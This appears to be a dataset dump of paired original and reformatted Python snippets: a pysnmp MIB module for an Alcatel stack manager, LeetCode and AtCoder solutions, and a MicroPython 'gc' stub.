ala_stack_mgr_cfg_mgr_group = object_group((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1, 1)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotNINumber'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSlotCMMNumber'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrChasRole'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrLocalLinkStateA'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrRemoteNISlotA'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrRemoteLinkA'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrLocalLinkStateB'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrRemoteNISlotB'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrRemoteLinkB'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrChasState'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrSavedSlotNINumber'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrCommandAction'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrCommandStatus'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrOperStackingMode'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrAdminStackingMode'))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ala_stack_mgr_cfg_mgr_group = alaStackMgrCfgMgrGroup.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrCfgMgrGroup.setDescription('A collection of objects providing information about the topology of the stack .')
ala_stack_mgr_notification_group = notification_group((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 1, 2)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrDuplicateSlotTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrNeighborChangeTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrRoleChangeTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrDuplicateRoleTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrClearedSlotTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrOutOfSlotsTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrOutOfTokensTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrOutOfPassThruSlotsTrap'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrBadMixTrap'))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
ala_stack_mgr_notification_group = alaStackMgrNotificationGroup.setStatus('current')
if mibBuilder.loadTexts:
alaStackMgrNotificationGroup.setDescription('A collection of notifications for signaling Stack manager events.')
alcatel_ind1_stack_mgr_mib_compliance = module_compliance((1, 3, 6, 1, 4, 1, 6486, 801, 1, 2, 1, 24, 1, 2, 2, 1)).setObjects(('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrCfgMgrGroup'), ('ALCATEL-IND1-STACK-MANAGER-MIB', 'alaStackMgrNotificationGroup'))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
alcatel_ind1_stack_mgr_mib_compliance = alcatelIND1StackMgrMIBCompliance.setStatus('current')
if mibBuilder.loadTexts:
alcatelIND1StackMgrMIBCompliance.setDescription('The compliance statement for device support of Stack Manager.')
mibBuilder.exportSymbols('ALCATEL-IND1-STACK-MANAGER-MIB', alaStackMgrStatPktsTx=alaStackMgrStatPktsTx, alaStackMgrNeighborChangeTrap=alaStackMgrNeighborChangeTrap, AlaStackMgrNINumber=AlaStackMgrNINumber, alaStackMgrStaticRoutePortState=alaStackMgrStaticRoutePortState, alaStackMgrDuplicateRoleTrap=alaStackMgrDuplicateRoleTrap, alaStackMgrTrapLinkNumber=alaStackMgrTrapLinkNumber, alaStackMgrOutOfSlotsTrap=alaStackMgrOutOfSlotsTrap, alaStackMgrOutOfPassThruSlotsTrap=alaStackMgrOutOfPassThruSlotsTrap, alaStackMgrDuplicateSlotTrap=alaStackMgrDuplicateSlotTrap, alaStackMgrRoleChangeTrap=alaStackMgrRoleChangeTrap, alaStackMgrLocalLinkStateA=alaStackMgrLocalLinkStateA, alaStackMgrCfgMgrGroup=alaStackMgrCfgMgrGroup, alcatelIND1StackMgrMIBObjects=alcatelIND1StackMgrMIBObjects, alaStackMgrStatPktsRx=alaStackMgrStatPktsRx, alaStackMgrStaticRouteRowStatus=alaStackMgrStaticRouteRowStatus, alcatelIND1StackMgrMIBCompliance=alcatelIND1StackMgrMIBCompliance, alaStackMgrSecondary=alaStackMgrSecondary, alaStackMgrAdminStackingMode=alaStackMgrAdminStackingMode, alaStackMgrStatDelayFromLastMsg=alaStackMgrStatDelayFromLastMsg, AlaStackMgrSlotState=AlaStackMgrSlotState, alaStackMgrChassisEntry=alaStackMgrChassisEntry, alaStackMgrStaticRouteDstStartIf=alaStackMgrStaticRouteDstStartIf, PYSNMP_MODULE_ID=alcatelIND1StackMgrMIB, alaStackMgrStaticRouteStatus=alaStackMgrStaticRouteStatus, AlaStackMgrSlotRole=AlaStackMgrSlotRole, alaStackMgrNotificationGroup=alaStackMgrNotificationGroup, alaStackMgrStatErrorsTx=alaStackMgrStatErrorsTx, alaStackMgrStatLinkNumber=alaStackMgrStatLinkNumber, alcatelIND1StackMgrMIB=alcatelIND1StackMgrMIB, alaStackMgrRemoteNISlotB=alaStackMgrRemoteNISlotB, alaStackMgrStackStatus=alaStackMgrStackStatus, alaStackMgrStaticRoutePort=alaStackMgrStaticRoutePort, AlaStackMgrCommandStatus=AlaStackMgrCommandStatus, alaStackMgrStatsEntry=alaStackMgrStatsEntry, AlaStackMgrCommandAction=AlaStackMgrCommandAction, AlaStackMgrLinkStatus=AlaStackMgrLinkStatus, alaStackMgrStaticRouteDstEndIf=alaStackMgrStaticRouteDstEndIf, alaStackMgrRemoteNISlotA=alaStackMgrRemoteNISlotA, alaStackMgrStaticRouteSrcStartIf=alaStackMgrStaticRouteSrcStartIf, alaStackMgrCommandStatus=alaStackMgrCommandStatus, alaStackMgrStatsTable=alaStackMgrStatsTable, alaStackMgrTraps=alaStackMgrTraps, alaStackMgrTokensUsed=alaStackMgrTokensUsed, alaStackMgrTokensAvailable=alaStackMgrTokensAvailable, alaStackMgrPrimary=alaStackMgrPrimary, alaStackMgrCommandAction=alaStackMgrCommandAction, alaStackMgrSlotNINumber=alaStackMgrSlotNINumber, AlaStackMgrLinkNumber=AlaStackMgrLinkNumber, alaStackMgrStaticRouteSrcEndIf=alaStackMgrStaticRouteSrcEndIf, alcatelIND1StackMgrTrapObjects=alcatelIND1StackMgrTrapObjects, alaStackMgrRemoteLinkB=alaStackMgrRemoteLinkB, AlaStackMgrStackingMode=AlaStackMgrStackingMode, alaStackMgrChasRole=alaStackMgrChasRole, alaStackMgrSavedSlotNINumber=alaStackMgrSavedSlotNINumber, alaStackMgrOutOfTokensTrap=alaStackMgrOutOfTokensTrap, alaStackMgrStaticRouteTable=alaStackMgrStaticRouteTable, alaStackMgrOperStackingMode=alaStackMgrOperStackingMode, alaStackMgrStaticRouteEntry=alaStackMgrStaticRouteEntry, alaStackMgrStatErrorsRx=alaStackMgrStatErrorsRx, alaStackMgrBadMixTrap=alaStackMgrBadMixTrap, alcatelIND1StackMgrMIBCompliances=alcatelIND1StackMgrMIBCompliances, AlaStackMgrStackStatus=AlaStackMgrStackStatus, alcatelIND1StackMgrMIBGroups=alcatelIND1StackMgrMIBGroups, alaStackMgrChasState=alaStackMgrChasState, alaStackMgrChassisTable=alaStackMgrChassisTable, alaStackMgrSlotCMMNumber=alaStackMgrSlotCMMNumber, alaStackMgrRemoteLinkA=alaStackMgrRemoteLinkA, alaStackMgrLocalLinkStateB=alaStackMgrLocalLinkStateB, alaStackMgrClearedSlotTrap=alaStackMgrClearedSlotTrap, alcatelIND1StackMgrMIBConformance=alcatelIND1StackMgrMIBConformance) |
class Solution:
def maxArea(self, height):
left, right, mx = 0, len(height) - 1, 0
while left < right:
mx = max(mx, (right - left) * min(height[left], height[right]))
if height[left] < height[right]:
left += 1
else:
right -= 1
return mx | class Solution:
def max_area(self, height):
(left, right, mx) = (0, len(height) - 1, 0)
while left < right:
mx = max(mx, (right - left) * min(height[left], height[right]))
if height[left] < height[right]:
left += 1
else:
right -= 1
return mx |
'''input
-1000000000 1000000000
Zero
-1 0
Zero
1 3
Positive
-3 -1
Negative
-4 -1
Positive
-1 1
Zero
0 1
Zero
'''
# -*- coding: utf-8 -*-
# AtCoder Grand Contest
# Problem A
if __name__ == '__main__':
a, b = list(map(int, input().split()))
if a * b <= 0:
print('Zero')
elif (a >= 1) or ((b <= -1) and ((b - a + 1) % 2 == 0)):
print('Positive')
else:
print('Negative')
| """input
-1000000000 1000000000
Zero
-1 0
Zero
1 3
Positive
-3 -1
Negative
-4 -1
Positive
-1 1
Zero
0 1
Zero
"""
if __name__ == '__main__':
(a, b) = list(map(int, input().split()))
if a * b <= 0:
print('Zero')
elif a >= 1 or (b <= -1 and (b - a + 1) % 2 == 0):
print('Positive')
else:
print('Negative') |
"""
Module: 'gc' on esp32_LoBo 3.2.9
"""
# MCU: (sysname='esp32_LoBo', nodename='esp32_LoBo', release='3.2.9', version='ESP32_LoBo_v3.2.9 on 2018-04-12', machine='ESP32 board with ESP32')
# Stubber: 1.1.2
def collect():
pass
def disable():
pass
def enable():
pass
def isenabled():
pass
def mem_alloc():
pass
def mem_free():
pass
def threshold():
pass
| """
Module: 'gc' on esp32_LoBo 3.2.9
"""
def collect():
pass
def disable():
pass
def enable():
pass
def isenabled():
pass
def mem_alloc():
pass
def mem_free():
pass
def threshold():
pass |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.